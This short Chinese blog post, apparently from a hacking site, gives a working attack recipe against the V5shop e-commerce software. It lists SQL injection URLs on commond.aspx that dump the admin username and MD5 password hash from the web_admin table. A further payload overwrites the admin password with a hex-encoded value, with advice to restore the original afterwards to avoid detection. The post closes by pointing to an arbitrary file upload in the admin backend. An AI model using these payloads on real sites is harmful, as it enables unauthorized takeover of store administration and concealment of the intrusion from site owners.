V5shop注入漏洞
/commond.aspx?id=1 and 1=(select top 1 [name] from web_admin)
上面这个可以直接显示出管理员用户名,汗一个。还是建个假管理员安全
/commond.aspx?id=1 and 1=(select top 1 [pass] from web_admin)
上面这个可以显示MD5密码,用于破解后还原他密码,以免发现
/commond.aspx?id=1 update web_admin set pass=0×31004200460041004500370042004500410043004600350036003200330041003200430042004400450037004400450041003600340042003700430037004300
后面这一套串是这样的,先将密码转成32位,再转换成大写,再转换成sql16进制
最后,进入后台了,系统设置水印上传那儿居然可以传任意文件,无语。。。
上一篇: MSSQL数据类型,占用字节详解
下一篇: 用vbs脚本获取进程的cpu
目前这篇文章有51条评论(Rss)